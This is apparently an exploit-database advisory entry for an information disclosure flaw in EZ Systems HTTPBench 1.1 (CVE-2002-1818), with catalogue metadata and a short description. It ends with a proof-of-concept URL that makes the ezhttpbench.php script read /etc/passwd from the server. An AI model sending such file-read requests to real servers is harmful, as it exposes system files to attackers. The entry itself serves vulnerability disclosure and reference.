EZ Systems HTTPBench 1.1 - Information Disclosure

Author: Tacettin Karadeniz
type: webapps
platform: php
port: nan
date_added: 2002-11-11 
date_updated: 2012-10-16 
verified: 1 
codes: CVE-2002-1818;OSVDB-59600 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/6153/info

An information disclosure vulnerability has been reported for httpbench. Reportedly, httpbench may disclose the contents of web server readable files to remote attackers.

Information obtained in this manner may be used to launch further, destructive attacks against a vulnerable system.

http://www.web_sitesi/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1